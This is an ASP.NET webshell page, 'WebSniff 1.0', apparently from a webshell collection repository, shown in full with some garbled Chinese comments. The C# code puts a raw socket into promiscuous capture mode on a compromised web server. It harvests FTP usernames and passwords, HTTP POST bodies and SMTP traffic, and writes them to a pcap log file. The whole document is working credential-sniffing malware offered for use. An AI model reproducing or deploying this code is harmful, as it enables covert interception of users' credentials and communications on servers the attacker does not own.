webshell/aspx/aspx下嗅探工具websniff1.0-linux.aspx
tennc ea6306d16f update
r00ts shell
2013-09-20 17:07:46 +08:00

707 lines
20 KiB
Text
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Collections" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.Net.NetworkInformation" %>
<%@ Import Namespace="System.Threading" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>WebSniff 1.0 Powered by C.C.T¡£linx Ð޸İæ </title>
</head>
<body>
<script runat="server">
static private Socket mainSocket; //The socket which captures all incoming packets
private static byte[] byteData = new byte[2048];
private static bool bContinueCapturing = true; //A flag to check if packets are to be captured or not
static int stoppackes = 0;
static int port = 0;
static string strIP = null;
static long packets = 0;
static System.IO.FileStream wfs;
static string logfile =null;
static PacketCaptureWriter pktwt;
static string keyword;
static DateTime stoptime = System.DateTime.Now.AddYears(-8);
static Thread th;
static int minisizepacket=0;
static string proException = null;
static Boolean logNextPacket = false;
static Boolean my_s_ftp= true;
static Boolean my_s_http_post = false;
static Boolean my_s_smtp = false;
protected void Page_Load(object sender, EventArgs e)
{
if (logfile == null)
{
logfile = Server.MapPath("w" + System.DateTime.Now.ToFileTime() + ".txt");
}
if (stoptime.Year == (System.DateTime.Now.Year - 8))
{
System.DateTime nextDay = System.DateTime.Now.AddDays(1);
stoptime = nextDay;
}
//ûÓÐÉú³ÉIPÁбí
if (ddlist.Items.Count==0)
{
IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));
if (HosyEntry.AddressList.Length > 0)
{
foreach (IPAddress ip in HosyEntry.AddressList)
{
ddlist.Items.Add(ip.ToString());
}
}
}
//Èç²»Êǵã»÷Starts°´Å¥£¬Ôò´òÓ¡ÒѾ­Éè¹ýµÄ²ÎÊý
if (Request.Form["Starts"] == null)
{
this.ddlist.SelectedValue = strIP;
this.txtport.Text = port.ToString();
this.txtMinisize.Text = minisizepacket.ToString();
this.txtkeywords.Text = keyword;
this.txtlogfile.Text = logfile;
this.txtpackets.Text = stoptime.ToString();
this.s_ftp.Checked = my_s_ftp;
this.s_http_post.Checked = my_s_http_post;
this.s_smtp.Checked = my_s_smtp;
}
if (th != null )
{
this.Lb_msg.Text = System.DateTime.Now.ToString()+" State: <b>" + th.ThreadState.ToString() +"</b> Packets: "+packets.ToString();
}
else
{
this.Lb_msg.Text = "Sniff Treads is not started";
}
if (Request.Form["Starts"] != null || th != null)
{
this.Starts.Enabled = false;
}
else
{
this.Starts.Enabled = true;
}
//µã»÷ÁËstop°´Å¥
if (Request.Form["Button1"] != null)
{
this.Starts.Enabled = true;
this.Lb_msg.Text = System.DateTime.Now.ToString() + " State: <b>stoping. Click \"Refresh\" again to see if thread is stoped successed.</b> Packets: " + packets.ToString();
}
Lb_msg2.Text = proException; //´íÎóÐÅÏ¢
}
protected void Refresh_Click(object sender, EventArgs e)
{
}
protected void Stop_Click(object sender, EventArgs e)
{
packets = stoppackes;
//stoptime = System.DateTime.Now;
proException += "<br>last time stop at " + System.DateTime.Now.ToString();
bContinueCapturing = false;
if (th != null)
{
th.Abort();
th = null;
}
try
{
wfs.Close();
mainSocket.Close();
}
catch (Exception ex)
{
}
}
protected void Pagestart()
{
//¼Ç¼ÉèÖùýµÄ²ÎÊý
strIP = ddlist.SelectedValue;
port = Int32.Parse(txtport.Text);
stoptime = Convert.ToDateTime( txtpackets.Text);
logfile = this.txtlogfile.Text;
keyword = txtkeywords.Text;
minisizepacket = Int32.Parse(txtMinisize.Text);
my_s_ftp = this.s_ftp.Checked;
my_s_http_post = this.s_http_post.Checked;
my_s_smtp = this.s_smtp.Checked;
wfs = System.IO.File.Create(logfile);
pktwt = new PacketCaptureWriter(wfs, LinkLayerType.RawIP);
bContinueCapturing = true;
packets = 0;
Start();
}
private static void Start()
{
byte[] byTrue = new byte[4] { 1, 0, 0, 0 };
byte[] byOut = new byte[4] { 1, 0, 0, 0 };
try
{
bContinueCapturing = true;
mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
mainSocket.Bind(new IPEndPoint(IPAddress.Parse(strIP), 0));
mainSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
mainSocket.IOControl(IOControlCode.ReceiveAll, byTrue, byOut);
}
catch (Exception ex)
{
proException += ex.ToString()+"<BR>"; //¾²Ì¬·½·¨¿ÉÒÔ·ÃÎʾ²Ì¬±äÁ¿proException
}
byteData = new byte[2048];
while (System.DateTime.Now <= stoptime)
{
ParseData(byteData, mainSocket.Receive(byteData));
}
bContinueCapturing = false;
wfs.Close();
mainSocket.Close();
}
protected void Start_Click(object sender, EventArgs e)
{
if (this.txtlogfile.Text == "" || txtpackets.Text.Length < 1 || txtport.Text == "") return;
th = new Thread(new ThreadStart(Pagestart));
th.Start();
//Session["workthread"] = th;
this.Lb_msg.Text = "\r\nSniffing.Click \"Refresh\" to see the lastest status.";
}
public static ushort Get2Bytes(byte[] ptr, int Index, int Type)
{
ushort u = 0;
if (Type == 0)
{
u = (ushort)ptr[Index++];
u *= 256;
u += (ushort)ptr[Index++];
}
else if (Type == 1)
{
u = (ushort)ptr[++Index];
u *= 256; Index--;
u += (ushort)ptr[Index++]; Index++;
}
return u;
}
private static void ParseData(byte[] byteData, int nReceived)
{
try
{
byte[] nbyte = new byte[nReceived];
Array.Copy(byteData, nbyte, nReceived);
if ((int)nbyte[9] == 6)
{
int sport = Get2Bytes(nbyte, 20,0);
int dport = Get2Bytes(nbyte, 22,0);
String datas=Encoding.Default.GetString(nbyte);
Boolean logIt=false;
if (my_s_ftp)
{
if ((sport == 21 || dport == 21) &&
(datas.IndexOf("USER ") >= 0 || datas.IndexOf("PASS ") >= 0)
)
{
logIt =true;
}
}
if (!logIt && my_s_http_post)
{
if(logNextPacket){
logIt =true;
logNextPacket=false;
}
if (!logIt && datas.IndexOf("POST ")>=0)
{
logIt =true;
logNextPacket=true;
}
}
if (!logIt && my_s_smtp && (dport == 25 || sport == 25))
{
logIt =true;
}
//Åж϶˿Ú
if (!logIt && (dport == port || sport == port))
{
if (nReceived > minisizepacket)
{
//ÅжϹؼü×Ö
if (keyword != "")
{
if (datas.IndexOf(keyword) >= 0)
{
logIt =true;
}
}
else
{
logIt =true;
}
}
}
if(logIt){
PacketCapture pkt = new PacketCapture(nbyte, nReceived);
pktwt.Write(pkt);
packets++;
}
}
}
catch { }
}
public struct UnixTime
{
public static readonly DateTime MinDateTime = new DateTime(1970, 1, 1, 0, 0, 0);
public static readonly DateTime MaxDateTime = new DateTime(2038, 1, 19, 3, 14, 7);
private readonly int _Value;
public UnixTime(int value)
{
if (value < 0)
throw new ArgumentOutOfRangeException("value");
_Value = value;
}
public int Value
{
get { return _Value; }
}
public DateTime ToDateTime()
{
const long START = 621355968000000000; // 1970-1-1 00:00:00
return new DateTime(START + (_Value * (long)10000000)).ToLocalTime();
}
public static UnixTime FromDateTime(DateTime dateTime)
{
if (dateTime < MinDateTime || dateTime > MaxDateTime)
throw new ArgumentOutOfRangeException("dateTime");
TimeSpan span = dateTime.Subtract(MinDateTime);
return new UnixTime((int)span.TotalSeconds);
}
public override string ToString()
{
return ToDateTime().ToString();
}
}
public enum LinkLayerType : uint
{
Null = 0,
Ethernet = 1,
RawIP = 101,
User0 = 147,
User1 = 148,
User2 = 149,
User3 = 150,
User4 = 151,
User5 = 152,
User6 = 153,
User7 = 154,
User8 = 155,
User9 = 156,
User10 = 157,
User11 = 158,
User12 = 159,
User13 = 160,
User14 = 161,
User15 = 162,
}
public sealed class PacketCaptureWriter
{
#region Fields
private const uint MAGIC = 0xA1B2C3D4;
private readonly Stream _BaseStream;
private readonly LinkLayerType _LinkLayerType;
private readonly int _MaxPacketLength;
private readonly BinaryWriter m_Writer;
private bool m_ExistHeader = false;
private int _TimeZone;
private int _CaptureTimestamp;
#endregion
#region Constructors
public PacketCaptureWriter(
Stream baseStream, LinkLayerType linkLayerType,
int maxPacketLength, int captureTimestamp)
{
if (baseStream == null) throw new ArgumentNullException("baseStream");
if (maxPacketLength < 0) throw new ArgumentOutOfRangeException("maxPacketLength");
if (!baseStream.CanWrite) throw new ArgumentException("Cant'Wirte Stream");
_BaseStream = baseStream;
_LinkLayerType = linkLayerType;
_MaxPacketLength = maxPacketLength;
_CaptureTimestamp = captureTimestamp;
m_Writer = new BinaryWriter(_BaseStream);
}
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType, int captureTimestamp)
: this(baseStream, linkLayerType, 0xFFFF, captureTimestamp)
{
}
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType)
: this(baseStream, linkLayerType, 0xFFFF, UnixTime.FromDateTime(DateTime.Now).Value)
{
}
#endregion
#region Properties
public short VersionMajor
{
get { return 2; }
}
public short VersionMinjor
{
get { return 4; }
}
public int TimeZone
{
get { return _TimeZone; }
set { _TimeZone = value; }
}
public int CaptureTimestamp
{
get { return _CaptureTimestamp; }
set { _CaptureTimestamp = value; }
}
public Stream BaseStream
{
get { return _BaseStream; }
}
public LinkLayerType LinkLaterType
{
get { return _LinkLayerType; }
}
public int MaxPacketLength
{
get { return _MaxPacketLength; }
}
#endregion
public void Write(PacketCapture packet)
{
CheckHeader();
m_Writer.Write(packet.Timestamp.Value);
m_Writer.Write(packet.Millseconds);
m_Writer.Write(packet.Packet.Count);
m_Writer.Write(packet.RawLength);
m_Writer.Write(packet.Packet.Array, packet.Packet.Offset, packet.Packet.Count);
}
public void Flush()
{
BaseStream.Flush();
}
private void CheckHeader()
{
if (!m_ExistHeader)
{
m_Writer.Write(MAGIC);
m_Writer.Write(VersionMajor);
m_Writer.Write(VersionMinjor);
m_Writer.Write(TimeZone);
m_Writer.Write(CaptureTimestamp);
m_Writer.Write(MaxPacketLength);
m_Writer.Write((uint)LinkLaterType);
m_ExistHeader = true;
}
}
}
public sealed class PacketCapture
{
private readonly UnixTime _Timestamp;
private readonly ArraySegment<byte> _Packet;
private readonly int _RawLength;
private readonly int _Millseconds;
public PacketCapture(ArraySegment<byte> packet, int rawLength, UnixTime timestamp, int millseconds)
{
if (packet.Count > rawLength)
throw new ArgumentException("Length Error", "rawLength");
_Packet = packet;
_Timestamp = timestamp;
_RawLength = rawLength;
_Millseconds = millseconds;
}
public PacketCapture(ArraySegment<byte> packet, int rawLength, DateTime timestamp)
: this(packet, rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(ArraySegment<byte> packet, int rawLength)
: this(packet, rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
{
}
public PacketCapture(ArraySegment<byte> packet)
: this(packet, packet.Count)
{
}
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, timestamp, millseconds)
{
}
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(byte[] packetData, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData), rawLength, timestamp, millseconds)
{
}
public PacketCapture(byte[] packetData, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(byte[] packetData, int rawLength)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
{
}
public PacketCapture(byte[] packetData)
: this(packetData, packetData.Length)
{
}
public ArraySegment<byte> Packet
{
get { return _Packet; }
}
public UnixTime Timestamp
{
get { return _Timestamp; }
}
public int Millseconds
{
get { return _Millseconds; }
}
public int RawLength
{
get { return _RawLength; }
}
}
</script>
<style type="text/css">
<!--
a {
color: #FF0000 ;text-decoration: none
}
#b
{
color: #336699;
font-size: 10pt;
text-align: right;
}
#tt
{
vertical-align: middle;
font-size: 12pt;
text-align: center;
}
#Ct_2
{
padding-left:30px;
font-size: 10pt;
color: #336699;
vertical-align: middle;
text-align: left;
background-color: aliceblue;
border-width: 1px;
border-style: solid;
border-color: -moz-use-text-color;
padding-bottom:10px;
}
-->
</style>
<form id="form1" runat="server">
<div id="tt"> <b> WebSniff 1.0</b><br /><br /> </div>
<div id="Ct_2" >
<table width="100%" >
<tr >
<td width="10%"> BindIP: </td>
<td ><asp:DropDownList ID="ddlist" runat="server" width="90%"></asp:DropDownList></td>
</tr>
<tr >
<td width="10%">Auto sniff: </td>
<td >
FTP Password:
<asp:CheckBox ID="s_ftp" runat="server" Checked />
&nbsp;&nbsp;
HTTP Post Data:
<asp:CheckBox ID="s_http_post" runat="server" />
&nbsp;&nbsp;
Smtp Data:
<asp:CheckBox ID="s_smtp" runat="server" />
</td>
</tr>
<tr>
<td ">
FilterPort:
</td>
<td>
<asp:TextBox ID="txtport" Text="0" width="90%" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td >
MiniSizeToCapture:
</td>
<td >
<asp:TextBox ID="txtMinisize" Text="0" width="90%" runat="server" ></asp:TextBox>
</td>
</tr>
<tr>
<td>
KeyWordsFilter:
</td>
<td>
<asp:TextBox ID="txtkeywords" runat="server" width="90%" Text=""></asp:TextBox>
</td>
</tr>
<tr>
<td >
LogFile:
</td>
<td>
<asp:TextBox ID="txtlogfile" runat="server" width="90%" Text="log.log" ></asp:TextBox>
</td>
</tr>
<tr>
<td >
Stop At Time:
</td>
<td>
<asp:TextBox ID="txtpackets" runat="server" width="90%" Text="300"></asp:TextBox>
</td>
</tr>
<tr>
<td >
Control:
</td>
<td width="90%" > <asp:Button ID="Starts" runat="server" OnClick="Start_Click" Text="Start" />
<asp:Button ID="Button1" runat="server" OnClick="Stop_Click" Text="Stop" />
<asp:Button ID="Button_ref" runat="server" OnClick="Refresh_Click" Text="Refresh/View Status" /><br />
</td>
</tr>
<tr>
<td >
Status:
</td>
<td width="90%"><div id="s"><asp:Label ID="Lb_msg" runat="server" Text=""></div></asp:Label>
</td>
</tr>
<tr>
<td >
</td>
<td width="90%"><div id="s"><asp:Label ID="Lb_msg2" runat="server" Text=""></div></asp:Label>
</td>
</tr>
</table>
</div><br /><br />
<div id=b>Powered by <a href="//www.cncert.net"> C.C.T </a>|Version 1.0
<a href=" http://hi.baidu.com/cnqing/blog/item/92d8b35008ad871f377abee4.html">1</a>
<a href="http://hi.baidu.com/linx2008/blog/item/7020f1de1b1c805395ee3768.html">2</a>
</div>
</form>
</body>
</html>